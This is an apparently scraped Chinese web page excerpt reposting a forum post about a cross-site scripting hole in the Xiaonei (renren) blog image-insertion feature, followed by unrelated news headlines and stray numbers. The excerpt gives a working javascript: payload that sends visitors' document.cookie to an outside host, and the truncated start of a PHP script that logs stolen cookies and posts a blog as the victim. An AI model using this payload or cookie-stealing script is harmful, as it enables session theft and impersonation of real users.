现在位置 >首页 > renrencom
0℃
狼族论坛fly发的 校内网在发blog时对插入图片过滤不严格,存在xss漏洞 在发blog时将插入图片URL写为如下代码即可触发:   javascript:window.location.href='//xxxxx/test.php?cookie='+document.cookietest.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下: <?php ob_start(); $url = 'blog.xiaonei.com'; $cookie=$_GET['cookie']; $cookie1=$cookie."\r\n\r\n"; fputs(fopen('a.txt','a+'),$cookie1...
阅读全文
  • 湖州德清县启动首批“潜力医师”项目 2018-07-25
  • 福建竹农联名写信:幸福生活节节高 祖国明天更美好 2018-07-24
  • 我的跟帖出不来,讨论不了,奈何?还以为版主护着我么?! 2018-07-23
  • 光明地产进入怡心湖板块,十陵流拍“扶不起”? ——凤凰网房产成都 2018-07-23
  • 外媒:“习莫会”为中印友谊注入活力} 2018-07-22
  • “关注泌尿健康”三金片媒体沙龙北京站 2018-07-21
  • “野鸡大学”重出江湖, 高招防骗别留死角 2018-07-21
  • 日本樱岛火山大规模喷发 2018-07-20
  • 炎炎夏日要怎么养生? 这些妙招不错! 2018-07-20
  • 杭州西湖天气,杭州西湖天气预报,杭州西湖天气预报一周 2018-07-19
  • 70| 109| 663| 729| 112| 269| 11| 189| 401| 344|